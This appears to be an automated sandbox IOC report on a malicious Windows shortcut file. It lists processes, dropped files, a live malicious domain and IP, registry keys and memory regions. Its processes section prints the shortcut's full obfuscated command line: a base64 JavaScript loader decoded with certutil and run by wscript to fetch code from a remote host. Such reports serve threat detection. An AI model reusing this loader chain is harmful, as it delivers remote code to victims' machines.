IOC Report
uk231b27we.lnk

loading gif

Files

File Path
Type
Category
Malicious
uk231b27we.lnk
MS Windows shortcut, Item id list present, Has Working directory, Has command line arguments, Archive, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hidenormalshowminimized
initial sample
malicious
C:\QxdHVBD\QxdHVBD.jS
ASCII text, with no line terminators
dropped

Processes

Path
Cmdline
Malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /V/D/c md C:\QxdHVBD\>nul 2>&1 &&s^eT XECY=C:\QxdHVBD\^QxdHVBD.^jS&&echo dmFyIEMxOHA9InNjIisiciI7RDE4cD0iaXAiKyJ0OmgiO0UxOHA9IlQiKyJ0UCIrIjoiO0dldE9iamVjdChDMThwK0QxOHArRTE4cCsiLy9nd2FlOC5pbmR1c3RyeWluZmx1ZW5jZS5zaG9wLz8zLyIpOw==>!XECY!&&cErtUtil -f -dEco^de !XECY! !XECY!&&ca^ll !XECY!
malicious
C:\Windows\System32\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\QxdHVBD\QxdHVBD.jS"
malicious
C:\Windows\System32\certutil.exe
cErtUtil -f -dEcode C:\QxdHVBD\QxdHVBD.jS C:\QxdHVBD\QxdHVBD.jS

URLs

Name
IP
Malicious
http://gwae8.industryinfluence.shop/?3/
172.67.221.22
malicious
http://gwae8.industryinfluence.shop/b
unknown
hTtP://gwae8.industryinfluence.shop/?3/
unknown
https://www.cloudflare.com/cdn-cgi/errorZ
unknown
https://www.cloudflare.com/
unknown
https://www.cloudflare.com/cdn-cgi/error
104.16.124.96
http://gwae8.industryinfluence.shop/
unknown
https://www.cloudflare.com/cdn-cgi/error(
unknown
https://www.cloudflare.com/cdn-cgi/errorZ.4
unknown
https://www.cloudflare.com/cdn-cgi/error&
unknown
https://www.cloudflare.com/cdn-cgi/error2.L
unknown
https://www.cloudflare.com/~
unknown
There are 2 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
gwae8.industryinfluence.shop
172.67.221.22
malicious
www.cloudflare.com
104.16.124.96

IPs

IP
Domain
Country
Malicious
172.67.221.22
gwae8.industryinfluence.shop
United States
malicious
104.16.124.96
www.cloudflare.com
United States

Registry

Path
Value
Malicious
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
LangID
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\System32\WScript.exe.FriendlyAppName
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\System32\WScript.exe.ApplicationCompany
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.60.3.1!7
Name
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.60.3.2!7
Name
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.60.3.3!7
Name

Memdumps

Base Address
Regiontype
Protect
Malicious
29B8EFB7000
heap
page read and write
29B8EFC5000
heap
page read and write
29B8EFC4000
heap
page read and write
29B8EFBE000
heap
page read and write
29B90E13000
heap
page read and write
29B927B0000
heap
page read and write
130114A0000
heap
page read and write
29B8F0D0000
heap
page read and write
2DC8DDE000
stack
page read and write
130114F0000
heap
page read and write
29B8EFDE000
heap
page read and write
29B8EF3C000
heap
page read and write
CA225FF000
stack
page read and write
29B8EF38000
heap
page read and write
29B8EFB7000
heap
page read and write
29B8EF4D000
heap
page read and write
29B8EFE2000
heap
page read and write
CA223F9000
stack
page read and write
2DC8CDC000
stack
page read and write
29B8F0D5000
heap
page read and write
29B90DF0000
remote allocation
page read and write
13011248000
heap
page read and write
29B8EFC2000
heap
page read and write
29B8EFC4000
heap
page read and write
29B8EFE8000
heap
page read and write
29B8EF8D000
heap
page read and write
29B92920000
trusted library allocation
page read and write
29B8EFC8000
heap
page read and write
29B90C90000
heap
page read and write
29B8EFDB000
heap
page read and write
29B8EF18000
heap
page read and write
CA220FF000
stack
page read and write
130130D0000
heap
page read and write
29B8EF80000
heap
page read and write
29B8EFE8000
heap
page read and write
29B8EFC5000
heap
page read and write
29B8EFDF000
heap
page read and write
13011400000
heap
page read and write
29B90C95000
heap
page read and write
29B8EFDB000
heap
page read and write
29B8EF44000
heap
page read and write
2DC8D5E000
stack
page read and write
1301124C000
heap
page read and write
CA21EFE000
stack
page read and write
29B8EF8D000
heap
page read and write
13011210000
heap
page read and write
29B8EF4B000
heap
page read and write
29B8EDB0000
heap
page read and write
2DC907E000
stack
page read and write
29B8EFB7000
heap
page read and write
29B8EFE8000
heap
page read and write
29B8EF80000
heap
page read and write
29B90DF0000
heap
page read and write
29B8EF37000
heap
page read and write
29B8EF8D000
heap
page read and write
29B8EFD0000
heap
page read and write
29B8F0DE000
heap
page read and write
CA21DFE000
stack
page read and write
130114F5000
heap
page read and write
29B8F0A4000
heap
page read and write
29B8EFBE000
heap
page read and write
29B8EFD0000
heap
page read and write
CA224FF000
stack
page read and write
29B8EF10000
heap
page read and write
29B8EFB7000
heap
page read and write
130111A0000
heap
page read and write
29B8EFBE000
heap
page read and write
29B8EFBE000
heap
page read and write
29B90DF5000
heap
page read and write
29B8EFE8000
heap
page read and write
29B8EF68000
heap
page read and write
29B8EFD0000
heap
page read and write
29B8EF44000
heap
page read and write
29B8EF9D000
heap
page read and write
CA21916000
stack
page read and write
CA21CFE000
stack
page read and write
29B90DF0000
remote allocation
page read and write
29B8EF3C000
heap
page read and write
29B8EFD0000
heap
page read and write
29B8EF69000
heap
page read and write
29B90E19000
heap
page read and write
CA226FD000
stack
page read and write
29B8EF44000
heap
page read and write
29B8F010000
heap
page read and write
29B8EEF0000
heap
page read and write
29B8EFC5000
heap
page read and write
13011238000
heap
page read and write
29B8EFE2000
heap
page read and write
29B8EF80000
heap
page read and write
29B8EF8D000
heap
page read and write
CA222FE000
stack
page read and write
29B8EFE2000
heap
page read and write
29B8EFC8000
heap
page read and write
29B8EFE8000
heap
page read and write
29B90DF0000
remote allocation
page read and write
29B8EFBE000
heap
page read and write
29B8EFC2000
heap
page read and write
29B8EF80000
heap
page read and write
29B8EFC8000
heap
page read and write
29B8EFE8000
heap
page read and write
29B8EFC2000
heap
page read and write
29B90E19000
heap
page read and write
29B8EFB7000
heap
page read and write
29B8F0A0000
heap
page read and write
CA221FF000
stack
page read and write
29B8EF96000
heap
page read and write
13011230000
heap
page read and write
29B8EFD0000
heap
page read and write
29B8EF66000
heap
page read and write
There are 99 hidden memdumps, click here to show them.